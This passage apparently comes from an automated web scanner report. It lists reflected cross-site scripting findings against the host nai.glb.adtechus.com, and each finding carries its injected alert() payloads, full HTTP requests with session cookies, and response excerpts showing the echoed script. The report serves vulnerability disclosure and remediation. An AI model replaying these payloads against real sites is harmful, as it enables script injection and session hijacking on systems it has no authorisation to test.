Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php7f0ce"-alert(1)-"a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...
4.261. http://nai.glb.adtechus.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cbaa"-alert(1)-"ca09c8b2d48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites7cbaa"-alert(1)-"ca09c8b2d48/all/modules/cck/modules/fieldgroup/fieldgroup.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sites7cbaa"-alert(1)-"ca09c8b2d48/all/modules/cck/modules/fieldgroup/fieldgroup.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.lin
...[SNIP]...
4.262. http://nai.glb.adtechus.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33df0"><script>alert(1)</script>af2ab37d182 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites33df0"><script>alert(1)</script>af2ab37d182/all/modules/cck/modules/fieldgroup/fieldgroup.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:38 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sites33df0"><script>alert(1)</script>af2ab37d182/all/modules/cck/modules/fieldgroup/fieldgroup.css?7" />
...[SNIP]...
4.263. http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6e31"-alert(1)-"80e49d308e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitesf6e31"-alert(1)-"80e49d308e4/all/modules/cck/theme/content-module.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sitesf6e31"-alert(1)-"80e49d308e4/all/modules/cck/theme/content-module.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternal
...[SNIP]...
4.264. http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46e31"><script>alert(1)</script>26686697292 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites46e31"><script>alert(1)</script>26686697292/all/modules/cck/theme/content-module.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sites46e31"><script>alert(1)</script>26686697292/all/modules/cck/theme/content-module.css?7" />
...[SNIP]...
4.265. http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7cba"-alert(1)-"7386dfa619e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/alle7cba"-alert(1)-"7386dfa619e/modules/cck/theme/content-module.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sites/alle7cba"-alert(1)-"7386dfa619e/modules/cck/theme/content-module.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilt
...[SNIP]...
4.266. http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27daf"><script>alert(1)</script>8fdd749c841 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all27daf"><script>alert(1)</script>8fdd749c841/modules/cck/theme/content-module.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sites/all27daf"><script>alert(1)</script>8fdd749c841/modules/cck/theme/content-module.css?7" />
...[SNIP]...
4.267. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2a3"><script>alert(1)</script>d041401717d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesad2a3"><script>alert(1)</script>d041401717d/all/modules/filefield/filefield.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sitesad2a3"><script>alert(1)</script>d041401717d/all/modules/filefield/filefield.css?7" />
...[SNIP]...
4.268. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cecfe"-alert(1)-"badc2bdf349 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitescecfe"-alert(1)-"badc2bdf349/all/modules/filefield/filefield.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:15 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sitescecfe"-alert(1)-"badc2bdf349/all/modules/filefield/filefield.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilte
...[SNIP]...
4.269. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f53d"-alert(1)-"0dc460e5eec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all2f53d"-alert(1)-"0dc460e5eec/modules/filefield/filefield.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sites/all2f53d"-alert(1)-"0dc460e5eec/modules/filefield/filefield.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="
...[SNIP]...
4.270. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d031f"><script>alert(1)</script>f3ffa1108c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/alld031f"><script>alert(1)</script>f3ffa1108c2/modules/filefield/filefield.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sites/alld031f"><script>alert(1)</script>f3ffa1108c2/modules/filefield/filefield.css?7" />
...[SNIP]...
4.271. http://nai.glb.adtechus.com/sites/all/modules/pollfield/pollfield.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/pollfield/pollfield.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8956f"-alert(1)-"64c6c38375d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites8956f"-alert(1)-"64c6c38375d/all/modules/pollfield/pollfield.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
